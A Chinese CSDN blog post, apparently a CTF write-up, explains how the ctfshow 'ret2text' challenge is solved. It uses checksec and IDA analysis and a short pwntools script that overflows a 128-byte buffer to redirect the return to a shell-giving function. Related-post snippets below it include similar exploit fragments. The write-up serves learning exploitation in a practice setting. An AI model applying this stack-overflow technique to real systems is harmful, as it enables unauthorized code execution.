ctfshow 01栈溢出之ret2text

最新推荐文章于 2024-07-06 20:53:40 发布

G_BEST

最新推荐文章于 2024-07-06 20:53:40 发布

阅读量350

点赞数

文章标签：系统安全

本文链接：https://blog.csdn.net/Cfoxer/article/details/129137115

版权

文章描述了一种针对开启NX保护的64位程序进行分析的场景。通过使用IDA查看文件和ctfshow函数的地址，确定了payload的构建方法。payload由128个A字符和8个B字符以及目标地址构成，用于覆盖特定函数，从而触发exploit。最终，将payload发送给程序并进入交互模式。

摘要由CSDN通过智能技术生成

信息收集

在这里插入图片描述
file查看文件为64位,同时checksec表明开启了NX保护,所以排除re2shellcode办法,再根据题目提示,锁定目标re2test

IDA

在这里插入图片描述
明确目标要替换返回到ctfshow函数

汇编模式下可查看其起始地址为38

而在main函数中,我们关注welcome函数
在这里插入图片描述
查看其变量s大小进行覆盖

根据上下s计算,其大小为0x80(转化十进制128)

构造payload

from pwn import *

ghust = process('./pwn')
# ghust = remote("node4.buuoj.cn",26246) 
addr = 0x400638

payload = b'A' * 128 + b'B'*8 + p64(addr)

ghust.sendline(payload)
ghust.interactive()

搞定

在这里插入图片描述

关注博主即可阅读全文

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

G_BEST

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
打赏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

栈溢出总结+ret2text

MuMuLee_的博客

09-17

545

1、堆栈溢出原理通俗的讲，栈溢出的原理就是不顾堆栈中分配的局部数据块大小，向该数据块写入了过多的数据，导致数据越界，结果覆盖了老的堆栈数据。 2、函数调用栈的结构和主要过程图示：文字说明：汇编代码 push 参数 3 #参数由右向左入栈 push 参数 2 push 参数 1 call 函数地址 #push当前指令位置，跳转到所调用函...

64位linux系统：栈溢出+ret2libc ROP attack

Zhangmii的博客

06-03

2390

一．实验要求栈溢出+ ret2libc ROP 操作系统：Ubuntu 16.04 64bit 安全机制：不可执行位保护，ASLR（内存地址随机化）打开安全机制，确保×××能绕过以上安全机制，利用漏洞完成attack，实现基本目标：调用system(“/bin/sh”)，打开shell。二．实验概述ret2libc（return-into-libc）是一种利用缓冲区溢出的代码复用技术，主要通过...

参与评论您还未登录，请先登录后发表或查看评论

pwn基础之ctfwiki-栈溢出-基本ROP-ret2text

qq_52658640的博客

04-21

1174

文章目录前言原理ret2text发现漏洞利用漏洞书写exp总结前言刚开始自己的二进制生涯，想记录一下自己的学习，如有错误还请大佬们斧正。原理 ret2text 即控制程序执行程序本身已有的的代码 (.text)。其实，这种攻击方法是一种笼统的描述。我们控制执行程序已有的代码的时候也可以控制程序执行好几段不相邻的程序已有的代码 (也就是 gadgets)，这就是我们所要说的 ROP。这时，我们需要知道对应返回的代码的位置。当然程序也可能会开启某些保护，我们需要想办法去绕过这些保护。 ret2tex

CTFShow的RE题（二）

最新发布

2302_79135465的博客

07-06

633

jar逆向，可以先当成 zip 解压缩，java 文件可以直接看，class 文件可以用jd分析或者 jadx （好看一些）没有给 iv 的 DES 加密，一般是 ECB mode。

CTFSHOW re2

XFox_的博客

10-28

1891

勒索病毒.exe 打开IDA_main函数里的返回值main_0: __CheckForDebuggerJustMyCode(&unk_40B027); Str = 0; memset(v19, 0, sizeof(v19)); Str1 = 0; memset(v17, 0, sizeof(v17)); memset(v15, 0, 0x100u); memset(v14, 0, 0x100u); v11 = 1; do { sub_401037("*

ctfshow re2

cainiao78777的博客

01-19

2595

打开附件如下勒索病毒我去上网查了一下，发现是通过加密数据，所以这个题可能和加密有关，除了勒索病毒还有一个enflag.txt打开如下先不管这个第一步查壳这个exe程序无壳。第二步用ida32位打开这个 shift+f12查看字符有个充值成功，跟进可以看到这个字符串 DHmqqvqxB^||zll@Jqjkwpmvez{ 可以知道是异或，脚本如下 s="DH~mqqvqxB^||zll@Jq~jkwpmvez{" key="" for c in s: key+=chr(ord

pwn小白入门03---ret2text

weixin_45943522的博客

02-21

6497

什么是栈溢出： 栈溢出指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数，因而导致与其相邻的栈中的变量的值被改变（比如gets函数，他不会去验证你输入的值的长度，通过这个函数，你可以往一个本身大小为4字节的数组中填入任意大小的数据，如果填入8字节的数据，将会导致栈溢出，进而程序报错）。就像是往杯子里倒水，水满了溢出来最后烫到你一样。最简单的栈溢出利用：ret2text 通过栈溢出修改call指令保存在栈上的返回地址（eip的值），这样cpu执行ret指令的时候，就会将被修改的值从栈上取

ret2text涉及到的堆栈平衡问题

qq_41560595的博客

01-04

4605

这个指令要求rsp+0x40的值是16字节对齐。错误的题解： from pwn import * io=process("./level0") raw_input() elf=ELF("./level0") system_addr=0x400596 io.recvuntil(b"World\n") payload=b"A"*(0x88)+p64(system_addr) io.send(payload) io.interactive() $rsp+0x40没有16字节对齐。正确的题解： fro.

跟着CTF-wiki学pwn——ret2text

qq_42882717的博客

06-21

1149

肾么叫做万死不辞呀，就是每天被气死一万次，也不辞职…(哭哭

ctfshow-re2

m0_74216884的博客

02-28

505

很明显这个不是flag，在看看ida，发现这里有个要求输出密钥的选项，根据上面的逻辑，它应该是会读取flag.txt文件然后解密最后输出enflag.txt文件的，那么我们就先把它给我们的enflag.txt改名成flag.txt，试试。后续我看了一下别人的wp，发现这是个rc4的加密，那我们也可以，将原本的enflag.txt的内容转换成16进制，运行成功后，重新出现了enflag.txt，不过此时里面的内容是flag了。发现奇怪字符，进去看看（下面那个flag.txt看过了，没什么东西）

CTFShow re2 （RC4

Mintind的博客

12-04

1227

本文：跟着大佬的博客一步一步做CTFShow re2的记录

RC4（CTFshow re2）

m0_72827793的博客

01-15

570

使用同一个密钥进行加密和解密。

[ctf.show.reverse] re2

weixin_52640415的博客

04-13

1191

签到完了就一个小题，本身不繁杂但是有点长。先是要求输入一个串然后逐位与0x1f异或后检查密钥是否正确 char __cdecl sub_401A70(char *Str, char *Str1) { char v3; // [esp+0h] [ebp-E4h] signed int i; // [esp+D0h] [ebp-14h] signed int v5; // [esp+DCh] [ebp-8h] __CheckForDebuggerJustMyCode(&unk_

Pwn_CTFShow_02

Trick的博客

11-08

630

Pwn_CTFShow_0101栈溢出之ret2text 01栈溢出之ret2text 很简单的一个栈溢出 直接IDA分析从main函数跟进到welcome函数 get() 很明显的溢出 payload = 'a'*(0x80+8) 因为是64位的，所以后面要加上8 Shift+F12 发现/bin/sh 果然够简单的。。。双击进去再双击找到地址 exp： from pwn import * p=remote('111.231.70.44',28072) payload='a'*(0

ctfshow - Reverse

qq_62262904的博客

05-18

698

这个地方建议用ida的动态调试去看，提示中给出值为4位，那么就假设给的flag是flag{0000}，调出来发现，i=6时，v16的值是000000000000E560，v17[6]=v5，那么v16+v5结果等于0xFFFF，退出循环，然后判断成功，所以v5=0xFFFF-v16=0x1A9F，提示也要求最小值，成功。这与一次性填充类似，只是使用生成的伪随机位而不是准备好的流。先写个脚本，异或回来，这里异或的是0x1f，再异或一次，就可以得到原始的Str，也就是输入的内容，定死了，就是。

REVERSE-PRACTICE-CTFSHOW-2

P1umH0的博客

07-07

3511

REVERSE-PRACTICE-CTFSHOW-2re3红包题武穆遗书数学不及格flag白给 re3 main函数，分析可知，将输入的字符串按十六进制转成数字，写到v5，赋给v17[6] 当i等于6时，v16会加上输入的值，然后进入循环，最后判断v16是否等于0xffff 因为v17[0~5]的值是固定的，于是当i等于0到5的过程中，v16最后的累加结果是固定的调试可得，当i刚刚++到6时，v16的值为0xE560 第二层for循环中，v16先加上v17[6]，然后判断是否大于0xffff，小于等于